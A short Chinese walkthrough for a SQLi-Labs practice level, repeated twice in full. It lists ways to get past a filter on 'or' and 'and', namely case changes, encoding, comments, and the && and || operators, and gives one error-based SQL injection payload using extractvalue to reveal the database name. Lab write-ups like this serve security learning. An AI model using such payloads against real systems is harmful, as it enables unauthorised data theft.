本关过滤了or和and
绕过方法如下:
大小写变形
Or,OR,oR
编码,hex,urlencode
添加注释
/*or*/and用&&替换 or用||替换
解题步骤如下:
可以看到,单引号产生报错
故以单引号为跳板实现报错注入
1'||extractvalue(1,concat(0x7e,database()))--+
以下步骤不再详述。
查表名、列名、数据的操作可参考本系列中有关报错注入的文章:SQLiLabs靶场解题专栏
本关过滤了or和and
绕过方法如下:
大小写变形
Or,OR,oR
编码,hex,urlencode
添加注释
/*or*/and用&&替换 or用||替换
解题步骤如下:
可以看到,单引号产生报错
故以单引号为跳板实现报错注入
1'||extractvalue(1,concat(0x7e,database()))--+
以下步骤不再详述。
查表名、列名、数据的操作可参考本系列中有关报错注入的文章:SQLiLabs靶场解题专栏